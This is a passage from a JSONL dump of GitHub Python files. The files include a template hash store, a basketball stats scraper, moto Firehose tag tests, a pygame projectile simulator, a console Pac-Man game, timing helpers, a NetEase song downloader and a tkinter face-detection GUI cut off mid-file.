)\n if target_hash != self.hashes[file_name]:\n changed = True\n return changed\n\n def _is_source_updated(self, file_name, file_content, source_template):\n changed = True\n content = file_content\n with_permission = True\n try:\n content = _mix(\n file_content,\n oct(file_system.file_permissions(source_template)),\n )\n except exceptions.NoPermissionsNeeded:\n # HttpFs does not have getsyspath\n # zip, tar have no permission\n # win32 does not work\n with_permission = False\n pass\n content_hash = get_hash(content)\n if file_system.exists(file_name):\n if file_name in self.hashes:\n if content_hash == self.hashes[file_name]:\n changed = False\n # else the dest file has not been created yet\n # so no need to get content hash at all\n if changed:\n self.hashes[file_name] = content_hash\n\n return changed, with_permission\n\n def save_hashes(self):\n with open(self.cache_file, \"w\") as f:\n json.dump(self.hashes, f)\n\n\nHASH_STORE = HashStore()\n\n\ndef get_file_hash(afile, with_permission=True):\n content = file_system.read_bytes(afile)\n try:\n if with_permission:\n content = _mix(content, oct(file_system.file_permissions(afile)))\n except exceptions.NoPermissionsNeeded:\n # HttpFs does not have getsyspath\n # zip, tar have no permission\n # win32 does not work\n pass\n return get_hash(content)\n\n\ndef get_hash(content):\n md5 = hashlib.md5()\n md5.update(content)\n return md5.digest().decode(\"latin1\")\n\n\ndef _mix(content, file_permissions_copy):\n file_permissions_copy = file_permissions_copy.encode(\"utf-8\")\n return content + file_permissions_copy\n","repo_name":"moremoban/moban","sub_path":"moban/core/hashstore.py","file_name":"hashstore.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"1716027567","text":"from datetime import datetime\nimport argparse\n\nfrom cassandra.cluster import Cluster\nimport requests\n\nfrom BasketballReferencePageTextSchema import BasketballReferencePageTextSchema\nfrom BasketballReferenceScrapeStatusSchema import BasketballReferenceScrapeStatusSchema\nfrom CassandraQueryBuilder import CassandraQueryBuilder\nfrom CassandraTables import CassandraTables\n\n\n__author__ = 'Ryan'\n\n\"\"\"\nCREATE TABLE nba.basketball_reference_page_text_table (\ngameid text,\ntype text,\npage text,\nscrapedate 
text,\nPRIMARY KEY (type, gameid)\n);\n\n\"\"\"\n\n\nclass BasketballReferencePageScraper:\n def __init__(self):\n self.cluster = Cluster()\n self.session = self.cluster.connect(CassandraTables.KEYSPACE_NBA)\n self.scrapeDate = str(datetime.today())\n\n\n def process(self, pageType):\n column = self.getColumnFromPageType(pageType)\n gameids = self.selectSource(column)\n links = self.selectLinks(gameids)\n for r in links:\n self.extractPage(r, pageType, column)\n\n\n def extractPage(self, row, pageType, column):\n r = requests.get(row.boxscorelink)\n self.writePageToTable(row.gameid, pageType, r.text)\n self.updateSourceTable(row.gameid, column)\n\n\n def updateSourceTable(self, gameId, column):\n self.session.execute(\n CassandraQueryBuilder.updateQueryBuilder(CassandraTables.BASKETBALLREFERENCE_SCRAPE_STATUS_TABLE,\n \"{0}=$${1}$$\".format(column, self.scrapeDate),\n [\"gameid=\\'{0}\\'\".format(gameId)]))\n\n def writePageToTable(self, gameId, pageType, text):\n self.session.execute(\n CassandraQueryBuilder.insertInto(CassandraTables.BASKETBALLREFERENCE_PAGE_TEXT,\n BasketballReferencePageTextSchema.toHeader(),\n [gameId, pageType, text, self.scrapeDate]\n )\n )\n\n def selectLinks(self, gameids):\n return self.session.execute(\n CassandraQueryBuilder.selectFrom(CassandraTables.BASKETBALLREFERENCE_GAME_LINKS_TABLE,\n ['gameid', 'boxscorelink'],\n [CassandraQueryBuilder.inClause('gameid', gameids)]))\n\n def selectSource(self, column):\n source = self.session.execute(\n CassandraQueryBuilder.selectFrom(CassandraTables.BASKETBALLREFERENCE_SCRAPE_STATUS_TABLE,\n ['gameid'],[column + \"=''\"]))\n return [r.gameid for r in source.current_rows]\n\n def getColumnFromPageType(self, pageType):\n if pageType == \"BoxScore\":\n return BasketballReferenceScrapeStatusSchema.boxscore_scrapedate\n elif pageType == \"PlayByPlay\":\n return BasketballReferenceScrapeStatusSchema.play_by_play_scrapedate\n elif pageType == \"ShotChart\":\n return BasketballReferenceScrapeStatusSchema.shotchart_scrapedate\n else:\n raise ValueError(\"The pageType provided is not a valid pageType\")\n\n\ndef main(argv):\n BSS = BasketballReferencePageScraper()\n if argv['run_all']:\n argv['playbyplay'] = True\n argv['boxscore'] = True\n argv['shotchart'] = True\n\n if argv['playbyplay']:\n BSS.process(\"PlayByPlay\")\n if argv['boxscore']:\n BSS.process(\"BoxScore\")\n if argv['shotchart']:\n BSS.process(\"ShotChart\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-ra', '--run-all', help='Will run all three page extractors (BoxScore, ShotChart, PlayByPlay)',\n action=\"store_true\", default=False)\n parser.add_argument('-bs', '--boxscore', help='Scrape all new boxscore links', action=\"store_true\", default=False)\n parser.add_argument('-sc', '--shotchart', help='Scrape all new shotchart links', action=\"store_true\", default=False)\n parser.add_argument('-pbp', '--playbyplay', help='Scrape all new playbyplay links', action=\"store_true\",\n default=False)\n results = vars(parser.parse_args())\n main(results)\n\n","repo_name":"rd11490/NBA","sub_path":"NBAProject/BasketballReferencePageScraper.py","file_name":"BasketballReferencePageScraper.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33231228282","text":"import os\n\nos.chdir('/home/eugenegalaxy/Documents/projects/simp/simp/tests/yolo_dataset/mask_incorrect_detections')\nCOUNT = 0\n\n\ndef increment():\n global COUNT\n 
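# bump the shared counter so each renamed file gets the next sequential number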
COUNT = COUNT + 1\n\n\ndef renamer():\n for f in os.listdir():\n f_name, f_ext = os.path.splitext(f)\n f_name = 'nofever_{0:04}'.format(COUNT)\n increment()\n\n new_name = '{}{}'.format(f_name, f_ext)\n os.rename(f, new_name)\n\n\ndef renamer_parts():\n for f in os.listdir():\n f_name, f_ext = os.path.splitext(f)\n # f_name = 'something'\n parts = f_name.split('height')\n f_name = parts[0]\n parts2 = f_name.split('_')\n f_name = '{0:04}'.format(COUNT) + '_old_' + parts2[1] + '_' + parts2[2]\n new_name = '{}{}'.format(f_name, f_ext)\n os.rename(f, new_name)\n increment()\n\n\nrenamer_parts()\n","repo_name":"eugenegalaxy/simp","sub_path":"simp/file_renamer.py","file_name":"file_renamer.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10853763740","text":"import numpy as np\nfrom time import time\nfrom datasphere.populate import init_data_sphere\nimport getpass, os, sys\n\ndef test_populate_init_data_sphere():\n \n Nx=3\n Ny=5\n Nz=7\n ZZ=np.arange(Nz, dtype=np.float64)\n YY=np.arange(Ny, dtype=np.float64)\n XX=np.arange(Nx, dtype=np.float64)\n\n print(XX,YY,ZZ)\n voxel_size=np.array([1.], dtype=np.float64)\n\n # (1) compute the result using our C extension\n t0 = time()\n out = init_data_sphere(ZZ, YY, XX,voxel_size)\n dt0 = time() - t0\n print(\"XX={}\".format(XX))\n print(\"XX shape={}\".format(XX.shape))\n print(\"out={}\".format(out))\n print(\"out.shape={}\".format(out.shape))\n\n\n# MAIN\nif __name__ == \"__main__\":\n test_populate_init_data_sphere()\n\n\n\n\n\n","repo_name":"a356617605/Datasphere","sub_path":"test_populate.py","file_name":"test_populate.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9971521811","text":"from SEIL_Energy import *\nimport paho.mqtt.client as mqtt\nimport MySQLdb\nfrom config import CONFIG\n# Open database connection\ndb = MySQLdb.connect(CONFIG[\"database\"][\"host\"],CONFIG[\"database\"][\"user\"],CONFIG[\"database\"][\"password\"],CONFIG[\"database\"][\"name\"] )\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(CONFIG[\"mqtt\"][\"topic\"])\n\nqueue = []\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n # print(msg.topic+\" \"+str(msg.payload))\n actual_value = str(msg.payload).split(',')[2]\n ts = int(float(str(msg.payload).split(',')[1]))\n # print(\"ts\",ts)\n if len(queue)<6:\n queue.append(actual_value)\n return\n predicted_value = energy_pred_LSTM(queue)\n queue.pop(0)\n queue.append(actual_value)\n print(predicted_value, actual_value)\n sql = \"insert into predicted_power(ts,predicted_value) values(\"+str(ts)+\", \"+str(predicted_value)+\")\"\n try:\n # Execute the SQL command\n cursor.execute(sql)\n # Commit your changes in the database\n db.commit()\n except:\n # Rollback in case there is any error\n db.rollback()\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(CONFIG[\"mqtt\"][\"host\"], CONFIG[\"mqtt\"][\"port\"], 60)\n\n# Blocking call that processes network traffic, 
dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nclient.loop_forever()","repo_name":"seil-cse-iitb/energy-prediction","sub_path":"live_prediction.py","file_name":"live_prediction.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32306336341","text":"\"\"\"Unit tests verifying tag-related delivery stream APIs.\"\"\"\nimport boto3\nfrom botocore.exceptions import ClientError\nimport pytest\n\nfrom moto import mock_firehose\nfrom moto.core import DEFAULT_ACCOUNT_ID as ACCOUNT_ID\nfrom moto.firehose.models import MAX_TAGS_PER_DELIVERY_STREAM\nfrom moto.moto_api._internal import mock_random\nfrom tests.test_firehose.test_firehose import TEST_REGION\nfrom tests.test_firehose.test_firehose import sample_s3_dest_config\n\n\n@mock_firehose\ndef test_list_tags_for_delivery_stream():\n \"\"\"Test invocations of list_tags_for_delivery_stream().\"\"\"\n client = boto3.client(\"firehose\", region_name=TEST_REGION)\n stream_name = f\"test_list_tags_{mock_random.get_random_hex(6)}\"\n\n number_of_tags = 50\n tags = [{\"Key\": f\"{x}_k\", \"Value\": f\"{x}_v\"} for x in range(1, number_of_tags + 1)]\n\n # Create a delivery stream to work with.\n client.create_delivery_stream(\n DeliveryStreamName=stream_name,\n S3DestinationConfiguration=sample_s3_dest_config(),\n Tags=tags,\n )\n\n # Verify limit works.\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, Limit=1\n )\n assert len(result[\"Tags\"]) == 1\n assert result[\"Tags\"] == [{\"Key\": \"1_k\", \"Value\": \"1_v\"}]\n assert result[\"HasMoreTags\"] is True\n\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, Limit=number_of_tags\n )\n assert len(result[\"Tags\"]) == number_of_tags\n assert result[\"HasMoreTags\"] is False\n\n # Verify exclusive_start_tag_key returns truncated list.\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, ExclusiveStartTagKey=\"30_k\"\n )\n assert len(result[\"Tags\"]) == number_of_tags - 30\n expected_tags = [\n {\"Key\": f\"{x}_k\", \"Value\": f\"{x}_v\"} for x in range(31, number_of_tags + 1)\n ]\n assert result[\"Tags\"] == expected_tags\n assert result[\"HasMoreTags\"] is False\n\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, ExclusiveStartTagKey=f\"{number_of_tags}_k\"\n )\n assert len(result[\"Tags\"]) == 0\n assert result[\"HasMoreTags\"] is False\n\n # boto3 ignores bad stream names for ExclusiveStartTagKey.\n result = client.list_tags_for_delivery_stream(\n DeliveryStreamName=stream_name, ExclusiveStartTagKey=\"foo\"\n )\n assert len(result[\"Tags\"]) == number_of_tags\n assert result[\"Tags\"] == tags\n assert result[\"HasMoreTags\"] is False\n\n # Verify no parameters returns entire list.\n client.list_tags_for_delivery_stream(DeliveryStreamName=stream_name)\n assert len(result[\"Tags\"]) == number_of_tags\n assert result[\"Tags\"] == tags\n assert result[\"HasMoreTags\"] is False\n\n\n@mock_firehose\ndef test_tag_delivery_stream():\n \"\"\"Test successful, failed invocations of tag_delivery_stream().\"\"\"\n client = boto3.client(\"firehose\", region_name=TEST_REGION)\n\n # Create a delivery stream for testing purposes.\n stream_name = f\"test_tags_{mock_random.get_random_hex(6)}\"\n client.create_delivery_stream(\n DeliveryStreamName=stream_name,\n 
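        # sample_s3_dest_config() builds a minimal S3 destination config for the test stream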
ExtendedS3DestinationConfiguration=sample_s3_dest_config(),\n )\n\n # Unknown stream name.\n unknown_name = \"foo\"\n with pytest.raises(ClientError) as exc:\n client.tag_delivery_stream(\n DeliveryStreamName=unknown_name, Tags=[{\"Key\": \"foo\", \"Value\": \"bar\"}]\n )\n err = exc.value.response[\"Error\"]\n assert err[\"Code\"] == \"ResourceNotFoundException\"\n assert (\n f\"Firehose {unknown_name} under account {ACCOUNT_ID} not found\"\n in err[\"Message\"]\n )\n\n # Too many tags.\n with pytest.raises(ClientError) as exc:\n client.tag_delivery_stream(\n DeliveryStreamName=stream_name,\n Tags=[{\"Key\": f\"{x}\", \"Value\": f\"{x}\"} for x in range(51)],\n )\n err = exc.value.response[\"Error\"]\n assert err[\"Code\"] == \"ValidationException\"\n assert (\n f\"failed to satisify contstraint: Member must have length \"\n f\"less than or equal to {MAX_TAGS_PER_DELIVERY_STREAM}\"\n ) in err[\"Message\"]\n\n # Bad tags.\n with pytest.raises(ClientError) as exc:\n client.tag_delivery_stream(\n DeliveryStreamName=stream_name, Tags=[{\"Key\": \"foo!\", \"Value\": \"bar\"}]\n )\n err = exc.value.response[\"Error\"]\n assert err[\"Code\"] == \"ValidationException\"\n assert (\n \"1 validation error detected: Value 'foo!' at 'tags.1.member.key' \"\n \"failed to satisfy constraint: Member must satisfy regular \"\n \"expression pattern\"\n ) in err[\"Message\"]\n\n # Successful addition of tags.\n added_tags = [\n {\"Key\": f\"{x}\", \"Value\": f\"{x}\"} for x in range(MAX_TAGS_PER_DELIVERY_STREAM)\n ]\n client.tag_delivery_stream(DeliveryStreamName=stream_name, Tags=added_tags)\n results = client.list_tags_for_delivery_stream(DeliveryStreamName=stream_name)\n assert len(results[\"Tags\"]) == MAX_TAGS_PER_DELIVERY_STREAM\n assert results[\"Tags\"] == added_tags\n\n\n@mock_firehose\ndef test_untag_delivery_stream():\n \"\"\"Test successful, failed invocations of untag_delivery_stream().\"\"\"\n client = boto3.client(\"firehose\", region_name=TEST_REGION)\n\n # Create a delivery stream for testing purposes.\n stream_name = f\"test_untag_{mock_random.get_random_hex(6)}\"\n tag_list = [\n {\"Key\": \"one\", \"Value\": \"1\"},\n {\"Key\": \"two\", \"Value\": \"2\"},\n {\"Key\": \"three\", \"Value\": \"3\"},\n ]\n client.create_delivery_stream(\n DeliveryStreamName=stream_name,\n ExtendedS3DestinationConfiguration=sample_s3_dest_config(),\n Tags=tag_list,\n )\n\n # Untag all of the tags. 
Verify there are no more tags.\n tag_keys = [x[\"Key\"] for x in tag_list]\n client.untag_delivery_stream(DeliveryStreamName=stream_name, TagKeys=tag_keys)\n results = client.list_tags_for_delivery_stream(DeliveryStreamName=stream_name)\n assert not results[\"Tags\"]\n assert not results[\"HasMoreTags\"]\n","repo_name":"getmoto/moto","sub_path":"tests/test_firehose/test_firehose_tags.py","file_name":"test_firehose_tags.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"19882159694","text":"import math\r\nimport pygame\r\n\r\npygame.init()\r\n\r\nglobal w, h, vo, theta\r\n\r\nw,h = 1024,1024\r\nscreen = pygame.display.set_mode((w,h))\r\ndef findVelocity(a = 9.8):\r\n global vox, voy, time, distance, vo\r\n vo = input('enter initial velocity(m/s):>')\r\n theta = input('enter angle(degrees):>')\r\n vo = int(vo)\r\n theta = int(theta)\r\n #convert theta to radians\r\n theta = math.radians(theta)\r\n #perform trig \r\n costheta = math.cos(theta)\r\n sintheta = math.sin(theta)\r\n #find x and y velocity\r\n vo = math.radians(vo)\r\n vox = vo * costheta \r\n voy = vo * sintheta\r\n #convert to degrees\r\n vox = math.degrees(vox)\r\n voy = math.degrees(voy)\r\n main()\r\n\r\ndef finish(a = 9.8):\r\n print('a =', a, 'm/s^2')\r\n print('Initial velocity =', vo, 'm/s')\r\n print('Vox = ', vox , 'm/s')\r\n print('Voy = ', voy , 'm/s')\r\n tt= voy * -2\r\n t = tt / a\r\n time = t * -1\r\n distance = vox * time\r\n print('projectile traveled', distance, 'meters in', time, 'seconds')\r\n\r\n\r\ndef main(a = 9.8, hdamp = 0.1, damp = 0.1):\r\n ball_x = 1018\r\n ball_y = 1018\r\n ball_x_v = int(vox)\r\n ball_y_v = int(voy)\r\n ball_y = int(ball_y)\r\n ball_x_v = int(ball_x_v)\r\n ball_y_v = int(ball_y_v)\r\n screen = pygame.display.set_mode((w,h))\r\n\r\n count = 0\r\n \r\n while True:\r\n\r\n screen.fill((0,0,0))\r\n\r\n\r\n if ball_x <= 0:\r\n\r\n ball_x_v = -ball_x_v*(1-damp)\r\n ball_x = 1\r\n ball_x = 1024\r\n if ball_y <= 0:\r\n\r\n ball_y_v = -ball_y_v*(1-damp)\r\n ball_x_v = ball_x_v*(1-hdamp)\r\n ball_y = 1\r\n ball_y = 1024\r\n if ball_x >= w:\r\n\r\n ball_x_v = -ball_x_v*(1-damp)\r\n\r\n #ball_x = ball_x - ball_x\r\n\r\n #print(ball_x)\r\n \r\n\r\n if ball_y >=h:\r\n ball_y_v = -ball_y_v*(1-damp)\r\n \r\n ball_y = h - 1\r\n #print('landing coordinates: ', ball_x, ' ', ball_y)\r\n \r\n \r\n\r\n \r\n oldposx = ball_x\r\n oldposy = ball_y\r\n ball_x += ball_x_v\r\n ball_y += ball_y_v\r\n ball_y_v += (a / 125)\r\n #print(ball_x, ball_y)\r\n print()\r\n \r\n \r\n pygame.draw.circle(screen, (255,255,255), (int(ball_x), int(ball_y)), 5)\r\n\r\n pygame.display.update()\r\n\r\nif __name__ == '__main__':\r\n\r\n findVelocity()\r\n","repo_name":"waddyado/2dphysics","sub_path":"simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31322624783","text":"from os import system\nimport functions.banco as b\n\n\ndef main():\n clientes = []\n contas = []\n\n while True:\n opcao = b.menu()\n\n if opcao == 'd':\n b.depositar(clientes)\n\n elif opcao == 's':\n b.sacar(clientes)\n\n elif opcao == 'e':\n b.exibir_extrato(clientes)\n\n elif opcao == 'nu':\n b.criar_cliente(clientes)\n\n elif opcao == 'nc':\n numero_conta = len(contas) + 1\n b.criar_conta(numero_conta, clientes, contas)\n\n elif opcao == 'lc':\n b.listar_contas(contas)\n\n elif opcao == 'l':\n system('cls')\n\n 
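        # 'q' leaves the menu loop and ends the program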
elif opcao == 'q':\n            break\n\n        else:\n            print(f'\n{ \" Invalid operation, please select the desired operation again. \".center(100, \"@\") }')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"GuilhermeDGDEV/DIO_sistema_bancario_python_poo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"41546346316","text":"if __name__ == '__main__':\n    from random import randint\n    import os\n    from time import sleep\n\n    TAMANHO_GRID = 10 # Size of the game grid\n    PACMAN = ['O', 'o'] # List of pacman shapes for each iteration\n    COMIDA = 'X' # Shape of the food\n    TEMPO_DA_INTERACAO = 0.5 # Time between pacman movement iterations\n\n    pos_pacman = [randint(0, TAMANHO_GRID - 1), randint(0, TAMANHO_GRID - 1)] # Pick a random position for pacman in the game\n    pos_comida = [randint(0, TAMANHO_GRID - 1), randint(0, TAMANHO_GRID - 1)] # Pick a random position for the food in the game\n\n    pacman_formato = PACMAN[0] # Shape of the first pacman in the game\n\n    # Print the game to the screen\n    def imprimir_grid():\n        os.system('cls')\n        for l in range(TAMANHO_GRID): # walk the game rows - index [0]\n            for c in range(TAMANHO_GRID): # walk the game columns - index [1]\n                if l == pos_pacman[0] and c == pos_pacman[1]:\n                    print(pacman_formato, end='') # Print Pacman's current shape on the grid\n                elif l == pos_comida[0] and c == pos_comida[1]:\n                    print(COMIDA, end='') # Print the food on the grid\n                else:\n                    print('.', end='')\n            print()\n\n    # Function to move Pacman toward the food\n    def mover_pacman():\n        if pos_pacman[0] < pos_comida[0]:\n            pos_pacman[0] += 1\n        elif pos_pacman[0] > pos_comida[0]:\n            pos_pacman[0] -= 1\n        elif pos_pacman[1] < pos_comida[1]:\n            pos_pacman[1] += 1\n        elif pos_pacman[1] > pos_comida[1]:\n            pos_pacman[1] -= 1\n\n    # Main game loop\n    while True:\n        imprimir_grid()\n        mover_pacman()\n\n        # Switch Pacman's shape to the next one in the list\n        pacman_formato = PACMAN[(PACMAN.index(pacman_formato) + 1) % len(PACMAN)]\n\n        if pos_pacman == pos_comida:\n            pos_comida = [randint(0, TAMANHO_GRID - 1), randint(0, TAMANHO_GRID - 1)]\n        sleep(TEMPO_DA_INTERACAO)","repo_name":"fhvol/projetoADS-AV2","sub_path":"pacman.py","file_name":"pacman.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"20723847246","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on : 2019/03/07 14:21:04 JST.\nLast Change: 2019/07/05 22:52:10 JST.\n\n\nMakes it easy to time code execution\nReference\n- https://qiita.com/tag1216/items/e1e3c565a2bf8dbc7f86\nException handling on errors\n- https://blog.amedama.jp/entry/2015/10/02/234946\n\n@author: Koki Obinata\n\"\"\"\nimport time\nfrom contextlib import contextmanager\nfrom collections import defaultdict\n\n\n@contextmanager\ndef single_timer(label):\n    \"\"\"\n    Measure how long a block of code takes\n\n    Usage\n    -----\n    with single_timer('some_process'):\n        time.sleep(0.1)\n\n    Parameters\n    ----------\n    label : str\n        Name used when printing the measured time\n    \"\"\"\n    start = time.time()\n    try:\n        yield\n    finally:\n        end = time.time()\n        print('{}: {:.4f}'.format(label, end-start))\n\n\n@contextmanager\ndef timer_for_each():\n    \"\"\"\n    Measure time separately for each operation, e.g. inside a for loop\n\n    Usage\n    -----\n    with timer_for_each() as timer:\n        for _ in range(10):\n            with timer('process1'):\n                time.sleep(0.1)\n\n            with timer('process2'):\n                time.sleep(0.2)\n\n    Parameters\n    ----------\n    label : str\n        Name used when printing the measured time\n    \"\"\"\n    times = defaultdict(float)\n\n    @contextmanager\n    def timer(label):\n        start = time.time()\n        try:\n            yield\n        finally:\n            end = time.time()\n            times[label] += end - start\n\n    yield timer\n\n    for label, t in times.items():\n        print('{}: {:.4f}'.format(label, t))\n\n\n@contextmanager\ndef timer_for_total(total_label):\n    \"\"\"\n    Measure time separately for each operation, e.g. inside a for loop,\n    and print the total elapsed time at the end\n\n    Usage\n    -----\n    with timer_for_total('Total time') as timer:\n        for _ in range(10):\n\n            with timer('process1'):\n                time.sleep(0.1)\n\n            with timer('process2'):\n                time.sleep(0.2)\n\n    Parameters\n    ----------\n    total_label : str\n        Name used when printing the total elapsed time\n\n    label : str\n        Name used when printing each measured time\n    \"\"\"\n    times = defaultdict(float)\n\n    @contextmanager\n    def timer(label):\n        start = time.time()\n        try:\n            yield\n        finally:\n            end = time.time()\n            times[label] += end - start\n\n    with timer(total_label):\n        yield timer\n\n    for label, t in times.items():\n        if label != total_label:\n            print('{}: {:.3f}'.format(label, t))\n    print('{}: {:.3f}'.format(total_label, times[total_label]))\n\n\nif __name__ == '__main__':\n    # timing a single kind of operation\n    with single_timer('for loop'):\n        MOD = 10**9 + 7\n        a = 0\n        for i in range(10**6):\n            a += i\n            a %= MOD\n\n    # time spent in each operation\n    with timer_for_each() as timer:\n        for _ in range(10):\n            with timer('process1'):\n                time.sleep(0.1)\n\n            with timer('process2'):\n                time.sleep(0.2)\n\n    # each operation + the total time\n    with timer_for_total('Total') as timer:\n        for _ in range(10):\n            with timer('process1'):\n                time.sleep(0.1)\n\n            with timer('process2'):\n                time.sleep(0.2)\n\n    # what happens when an exception is raised\n    with single_timer('Error handling'):\n        print(\"Let's raise error\")\n        raise Exception('Error occurred!')\n","repo_name":"IkokObi/Reference","sub_path":"Python/context_manager/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"3371684827","text":"# /usr/bin/env python\n# -*- coding: utf-8 -*-\n# author = 'Han Kai'\nimport requests,re\nimport urllib.request\n\ndef getResponse(url, headers):\n    try:\n        response = requests.get(url=url, headers=headers)\n        if response.status_code == 200:\n            return response\n        return None\n    except Exception as e:\n        return None\n\ndef getSongname(songid):\n    try:\n        headers = {\n            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'\n        }\n        url = 'https://music.163.com/song?id={}'.format(songid)\n        html = getResponse(url, headers=headers).text\n        # print(html)\n        title = re.findall('(.*?)', html, re.S)\n        print('----------------')\n        print(title)\n        name = title[0].split('-')[0]\n        return name.strip()\n    except:\n        print(\"Failed to fetch the song name\")\n\nif __name__ == '__main__':\n    songid = input(\"Enter the id of the song to download:\")\n    url = 'http://music.163.com/song/media/outer/url?id={}'.format(int(songid))\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'\n    }\n    download_url = getResponse(url, headers).url\n    Songname = getSongname(int(songid))\n    print(\"Download URL:\",download_url)\n    print(\"Downloading song:\", Songname)\n    # like \"with open\", this call saves the file at the URL under the given name\n    urllib.request.urlretrieve(download_url, Songname + '.mp3')\n\n","repo_name":"hanshoukai/Python-","sub_path":"Python实用小脚本/网易云根据歌曲id下载.py","file_name":"网易云根据歌曲id下载.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"6016511591","text":"from tkinter import *\r\nimport 
tkinter as tk\r\nimport cv2\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter import filedialog\r\nimport datetime\r\n\r\n\r\nclass MainGUI:\r\n def __init__(self, root) -> None:\r\n # BUTTON ON/OFF STATES\r\n self.isDetectEyes = False\r\n self.isDetectFace = False\r\n self.isDetectSmile = False\r\n self.isDetectCat = False\r\n self.isUsingWebCam = False\r\n self.isPlayingVideo = False\r\n self.isImageSelected = False\r\n\r\n # DEFAULT IMAGE WHEN NO IMAGE/VIDEO SOURCE IS USED\r\n self.defaultFrameImage = PhotoImage(file=r\"./icons/need_image.png\")\r\n\r\n # RESIZING ICONS TO A SMALLER SIZE\r\n iconWidth = 1 # Icons will resize 1/n of the original Icon Image\r\n iconHeight = 1\r\n eyeIcon = PhotoImage(\r\n file=r\"./icons/eye.png\").subsample(iconWidth, iconHeight)\r\n faceIcon = PhotoImage(\r\n file=r\"./icons/face-detection.png\").subsample(iconWidth, iconHeight)\r\n smileIcon = PhotoImage(\r\n file=r\"./icons/smile.png\").subsample(iconWidth, iconHeight)\r\n catIcon = PhotoImage(\r\n file=r\"./icons/cat.png\").subsample(iconWidth, iconHeight)\r\n webCamIcon = PhotoImage(\r\n file=r\"./icons/webcam.png\").subsample(iconWidth, iconHeight)\r\n videoIcon = PhotoImage(\r\n file=r\"./icons/video.png\").subsample(iconWidth, iconHeight)\r\n imageIcon = PhotoImage(\r\n file=r\"./icons/image.png\").subsample(iconWidth, iconHeight)\r\n stopIcon = PhotoImage(\r\n file=r\"./icons/stop-button.png\").subsample(iconWidth, iconHeight)\r\n captureIcon = PhotoImage(\r\n file=r\"./icons/photo-capture.png\").subsample(iconWidth, iconHeight)\r\n\r\n # MAIN WINDOW\r\n self.root = root\r\n self.root.title(\"Final Project\")\r\n self.root.configure(bg=\"#4DBF85\")\r\n self.root.option_add(\"*font\", \"Arial 12\")\r\n self.root.resizable(False, False)\r\n\r\n # IMAGE/VIDEO CANVAS\r\n imageFrame = Frame(self.root)\r\n imageFrame.grid(row=0, column=0, padx=10, pady=10)\r\n self.labelImage = Label(imageFrame)\r\n self.labelImage.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n # INDIVIDUAL FRAMES FOR GROUPED BUTTONS FOR BETTER LAYOUT\r\n buttonsFrame = Frame(self.root, width=650, height=400)\r\n buttonsFrame.grid(row=0, column=1, padx=10, pady=5)\r\n\r\n sourcesButtonsFrame = Frame(buttonsFrame)\r\n detectButtonsFrame = Frame(buttonsFrame)\r\n snapshotButtonsFrame = Frame(buttonsFrame)\r\n\r\n sourcesButtonsFrame.grid(row=1, column=0)\r\n detectButtonsFrame.grid(row=3, column=0)\r\n snapshotButtonsFrame.grid(row=5, column=0)\r\n\r\n # BUTTONS\r\n # SOURCE BUTTONS\r\n self.buttonUseWebCam = Button(\r\n sourcesButtonsFrame, width=80, text=\"Webcam\", image=webCamIcon,\r\n compound=TOP, command=self.start_webcam)\r\n self.buttonUploadVideo = Button(\r\n sourcesButtonsFrame, width=80, text=\"Video\", image=videoIcon,\r\n compound=TOP, command=self.upload_video)\r\n self.buttonUploadImage = Button(\r\n sourcesButtonsFrame, width=80, text=\"Image\", image=imageIcon,\r\n compound=TOP, command=self.upload_image)\r\n\r\n # DETECTION BUTTONS\r\n self.buttonEyes = Button(\r\n detectButtonsFrame, text=\"Eyes\", 